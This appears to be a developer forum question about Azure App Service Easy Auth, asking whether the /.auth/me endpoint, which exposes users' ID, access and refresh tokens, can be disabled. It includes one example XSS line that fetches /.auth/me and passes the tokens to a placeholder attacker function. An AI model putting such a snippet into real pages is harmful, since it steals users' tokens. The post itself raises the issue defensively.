App Service Easy auth and disabling /.auth/me

I plan on using Easy Auth with a ASP.NET Core web application hosted on Azure App Service with the Linux flavor.

From my understanding Easy Auth adds a couple of endpoints to the app service:

• /.auth/login/<provider>/callback
• /.auth/logout
• /.auth/me

Usually when I use OpenID Connect and OAuth 2.0 I always opt for the authorization code flow to avoid users having direct access to their tokens (id_token/access_token/refresh_token) as the backend is capable of handling this through cookies in the browser and tokens stored elsewhere away from the user.

I have enabled Easy Auth with the token stored for my application and it works as expected. My question is mainly concerned with the /.auth/me endpoint. This endpoint exposes all the tokens, along with the claims of the user. If I enable scopes for offline_access then refresh_token is also exposed here. From a security perspective this seems horrible as a simple XSS attack could read the tokens and ship them off to an attackers server.

fetch("/.auth/me").then(r => r.json()).then(sendToMaliciousServer)

My questions are:

• Can I disable this endpoint in Easy Auth to avoid the security issue while still maintaining access to having a token store?
• Is MSAL (or rather Microsoft.Identity.Web) dependant on this endpoint to be able to read out the access_token from the token store of Easy Auth before calling downstream services?